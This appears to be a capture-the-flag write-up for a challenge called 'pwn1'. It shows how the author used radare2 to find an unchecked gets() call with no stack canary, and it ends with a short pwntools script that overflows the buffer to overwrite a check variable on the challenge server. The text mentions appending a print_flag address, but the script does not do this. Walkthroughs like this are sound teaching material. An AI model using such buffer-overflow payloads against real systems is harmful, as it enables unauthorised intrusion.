pwn1 asks the user to enter a passphrase.
This is a super secret program Noone is allowed through except for those who know the secret! What is my secret? WHAT_DO_I_KNOW? That is not the secret word!
So, I assume there will be some check somewhere.
I checked the results of strings command to see if there is a password hardcoded into the program.
Nope, but nice try.
It’s time for giving radare2 a chance. Let’s analyse…
The input is useless because is stored in
eax… but the check with the password (which is
\xf0\x07\xba\x11) is performed with a local variable set to 0.
So, how can I pwn it?
Easy peasy! there is a gets without length check: this means that I can write portions of the stack and do whatever I want with this program.
Even better, there is no canary!
I can write the password in the correct memory cell.
The exploit is some glibberish and than the address of the
BE CAREFUL: I assumed ASLR was disabled on server.
So I opened a shell with ASLR disabled, got the address of
print_flag and appended to the exploit string.
My assumption was correct! There is no ASLR on server side.
I used pwntools for crafting and simplicity. This is the script:
from pwn import * exc = remote('pwn.ctf.tamu.edu',4321) exc.sendline('A'*23 + p32(0xf007ba11)) exc.interactive()
23 is the lenght of the input string buffer in stack (found with radare2).
Flag captured ;-)